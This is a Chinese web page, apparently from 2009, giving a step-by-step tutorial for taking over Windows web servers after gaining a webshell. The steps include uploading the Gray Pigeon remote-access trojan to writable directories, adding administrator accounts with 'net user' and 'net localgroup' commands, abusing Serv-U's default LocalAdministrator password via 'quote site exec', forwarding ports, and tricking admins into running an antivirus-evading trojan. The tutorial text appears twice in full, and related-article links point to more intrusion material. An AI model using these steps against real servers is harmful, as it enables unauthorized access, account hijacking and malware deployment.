webshell 提權(quán)方法 服務(wù)器提權(quán)教程
發(fā)布時(shí)間:2009-09-30 00:30:02 作者:佚名
我要評(píng)論

提高入侵網(wǎng)站服務(wù)器的成功率,從事網(wǎng)絡(luò)安全的朋友可以參考下,如果防范。
一:首先檢測(cè)一下網(wǎng)站的服務(wù)器是否開了 3389
遠(yuǎn)程終端
二:檢測(cè)一下服務(wù)是否用了serv-u (還有是什么版本的)
方法
一:復(fù)制一個(gè)網(wǎng)站 用 3389 登陸器連接一下 (是否成功)
能連接了,拿下服務(wù)器的機(jī)率,提高 30%了
二:用ftp模式查下一個(gè)服務(wù)器的版本
開始 -- 運(yùn)行 -- cmd -- ftp (加你要登陸的網(wǎng)站)
---------------------------------------------------------------------------------------
第一步:最簡(jiǎn)單的方法
看有沒(méi)有權(quán)限,能不能執(zhí)行命令,行的話直接傳個(gè)鴿子運(yùn)行(成功率非常低)
----------------------------------------------------------------------------------------
第二步::尋找有執(zhí)行的權(quán)限目錄
c:\winnt\system32\inetsrv\data\
c:\Documents and Settings\All Users\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
這樣的目錄可以直接上傳鴿子,運(yùn)行
-----------------------------------------------------------------------------------
第三步:傳個(gè)cmd和開帳號(hào)的ftp.exe上去直接加帳號(hào)
命令就是你上傳目錄D:\VMware Workstation\cmd.exe "net user xiao xiao
/add"
-----------------------------------------------------------------------------------
第四步:asp提權(quán)木馬直接提權(quán)
serv-u 6.3 版本 好象用asp提權(quán)木馬(不成功)
serv-u 6.2 版本 好象可以
不過(guò)提權(quán)能不能用asp木馬還要看服務(wù)器,設(shè)置的變態(tài)不
假設(shè)直接用asp提權(quán)成功之后,還是不成功,但是可以在
cmd之下 用這個(gè)帳號(hào)連接一下
ftp (加你提權(quán)的網(wǎng)站)
帳號(hào):LocalAdministrator 密碼:$ak#.1k;0@p">#1@$ak#.1k;0@p
如果成功連接后就可以直接添加管理員帳號(hào)了
命令:quote site exec (你添加的帳號(hào)) net user 123 123 /ad
quote site exec (把帳號(hào)提升到最高權(quán)限) net localgroup administartors
123 /add
---------------------------------------------------------------------------------------
第五步:pcaanywhere
C:\Documents and Settings\All Users\Application
Data\Symantec\pcAnywhere\
這里下他的GIF文件,在本地安裝pcanywhere上去
網(wǎng)上很多教程
---------------------------------------------------------------------------------------
第六步:serv-u覆蓋提權(quán)
本地安裝個(gè)su,將你自己的ServUDaemon.ini文件用從他那下載下來(lái)的ServUDaemon.ini
網(wǎng)上很多教程
----------------------------------------------------------------------------------------
第七步:Serv-U轉(zhuǎn)發(fā)端口
給Latte加鹽 曾經(jīng)做個(gè)一個(gè)(serv-u經(jīng)典提權(quán)全套教程)用到過(guò)這個(gè)方法,可以學(xué)習(xí)一下
上傳個(gè)端口轉(zhuǎn)發(fā)工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個(gè)Serv-u,新建一個(gè)服務(wù)器,
IP填對(duì)方IP,帳號(hào)為L(zhǎng)ocalAdministrator
密碼為$ak#.1k;0@p">#1@$ak#.1k;0@p,
連接上后你就可以管理他的Serv-u了
--------------------------------------------------------------------------------------------
第八步:社會(huì)工程學(xué)之提升提權(quán)
把灰鴿子傳到上面,然后轉(zhuǎn)移到c盤,就等著管理員運(yùn)行了,前提你的鴿子必須免殺
要是讓我看到一個(gè)不清楚的exe程序,老想點(diǎn)開看看,呵呵(估計(jì)沒(méi)有那個(gè)SB會(huì)點(diǎn)吧)
遠(yuǎn)程終端
二:檢測(cè)一下服務(wù)是否用了serv-u (還有是什么版本的)
方法
一:復(fù)制一個(gè)網(wǎng)站 用 3389 登陸器連接一下 (是否成功)
能連接了,拿下服務(wù)器的機(jī)率,提高 30%了
二:用ftp模式查下一個(gè)服務(wù)器的版本
開始 -- 運(yùn)行 -- cmd -- ftp (加你要登陸的網(wǎng)站)
---------------------------------------------------------------------------------------
第一步:最簡(jiǎn)單的方法
看有沒(méi)有權(quán)限,能不能執(zhí)行命令,行的話直接傳個(gè)鴿子運(yùn)行(成功率非常低)
----------------------------------------------------------------------------------------
第二步::尋找有執(zhí)行的權(quán)限目錄
c:\winnt\system32\inetsrv\data\
c:\Documents and Settings\All Users\
c:\Program Files\serv-u\
C:\Program Files\Microsoft SQL Server\
這樣的目錄可以直接上傳鴿子,運(yùn)行
-----------------------------------------------------------------------------------
第三步:傳個(gè)cmd和開帳號(hào)的ftp.exe上去直接加帳號(hào)
命令就是你上傳目錄D:\VMware Workstation\cmd.exe "net user xiao xiao
/add"
-----------------------------------------------------------------------------------
第四步:asp提權(quán)木馬直接提權(quán)
serv-u 6.3 版本 好象用asp提權(quán)木馬(不成功)
serv-u 6.2 版本 好象可以
不過(guò)提權(quán)能不能用asp木馬還要看服務(wù)器,設(shè)置的變態(tài)不
假設(shè)直接用asp提權(quán)成功之后,還是不成功,但是可以在
cmd之下 用這個(gè)帳號(hào)連接一下
ftp (加你提權(quán)的網(wǎng)站)
帳號(hào):LocalAdministrator 密碼:$ak#.1k;0@p">#1@$ak#.1k;0@p
如果成功連接后就可以直接添加管理員帳號(hào)了
命令:quote site exec (你添加的帳號(hào)) net user 123 123 /ad
quote site exec (把帳號(hào)提升到最高權(quán)限) net localgroup administartors
123 /add
---------------------------------------------------------------------------------------
第五步:pcaanywhere
C:\Documents and Settings\All Users\Application
Data\Symantec\pcAnywhere\
這里下他的GIF文件,在本地安裝pcanywhere上去
網(wǎng)上很多教程
---------------------------------------------------------------------------------------
第六步:serv-u覆蓋提權(quán)
本地安裝個(gè)su,將你自己的ServUDaemon.ini文件用從他那下載下來(lái)的ServUDaemon.ini
網(wǎng)上很多教程
----------------------------------------------------------------------------------------
第七步:Serv-U轉(zhuǎn)發(fā)端口
給Latte加鹽 曾經(jīng)做個(gè)一個(gè)(serv-u經(jīng)典提權(quán)全套教程)用到過(guò)這個(gè)方法,可以學(xué)習(xí)一下
上傳個(gè)端口轉(zhuǎn)發(fā)工具
命令:(工具名)–v –l 3333 –r 43958 127.0.0.1
意思是將3333端口映射到43958端口上。 然后就可以在本地安裝一個(gè)Serv-u,新建一個(gè)服務(wù)器,
IP填對(duì)方IP,帳號(hào)為L(zhǎng)ocalAdministrator
密碼為$ak#.1k;0@p">#1@$ak#.1k;0@p,
連接上后你就可以管理他的Serv-u了
--------------------------------------------------------------------------------------------
第八步:社會(huì)工程學(xué)之提升提權(quán)
把灰鴿子傳到上面,然后轉(zhuǎn)移到c盤,就等著管理員運(yùn)行了,前提你的鴿子必須免殺
要是讓我看到一個(gè)不清楚的exe程序,老想點(diǎn)開看看,呵呵(估計(jì)沒(méi)有那個(gè)SB會(huì)點(diǎn)吧)
相關(guān)文章
qq號(hào)被盜了怎么辦 如何找回被盜的QQ號(hào)碼
這篇文章主要為大家分享一下當(dāng)qq被盜時(shí)的找回密碼的方法需要的朋友可以參考一下,盡量到官方網(wǎng)站操作2015-05-12- 通過(guò)幾次成功的拿Webshell,發(fā)現(xiàn)自己有時(shí)也走了一些彎路,為了避免其他的朋友再在困惑中迷失方向,現(xiàn)在我將自己的一些經(jīng)驗(yàn)寫出來(lái),希望對(duì)一些想學(xué)拿Webshell的朋友有一定的2008-10-08
- 大家是不是拿到了很多webshell.... 但 無(wú)法提權(quán)....2009-09-30
- 這篇文章主要介紹了整人用的一個(gè)電腦重啟病毒,本文用bat文件偽造如QQ圖標(biāo)等常用軟件,導(dǎo)致點(diǎn)擊就會(huì)重啟的惡作劇腳本,需要的朋友可以參考下2014-10-10
- 1.名稱:如何制作圖片ASP木馬 (可顯示圖片) 建一個(gè)asp文件,內(nèi)容為<!--#i nclude file="ating.jpg"--> 找一個(gè)正常圖片ating.jpg,插入一句話木2008-10-08
- FCKeditor的JSP版漏洞 http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFol2009-04-20
黑客專家教你設(shè)計(jì)不易破解的密碼以及注意事項(xiàng)
美國(guó)一家密碼管理應(yīng)用提供商SplashData 公司近期總結(jié)出2012年度最差的25個(gè)密碼,美國(guó)《紐約時(shí)報(bào)》作家尼克爾·佩爾榮斯近日撰文指出,密碼要想不被黑客猜中,有幾點(diǎn)非2012-11-13偽黑客的成功的秘密:tomcat入侵和Jboss入侵的方法介紹(圖)
黑客必須要有專業(yè)的知識(shí),豐富的經(jīng)驗(yàn)。而偽黑客不需要,只需要幾個(gè)工具,掃描默認(rèn)口令、弱口令、漏洞,就能利用。2012-05-18詳解服務(wù)器三大攻擊殺手(DDoS CC攻擊 ARP欺騙)
大家都知道服務(wù)器的攻擊有很多種,但是有三種主流的攻擊,那就是DoS攻擊、CC攻擊以及ARP欺騙,下面小編就為大家具體的講解這三種攻擊2016-10-20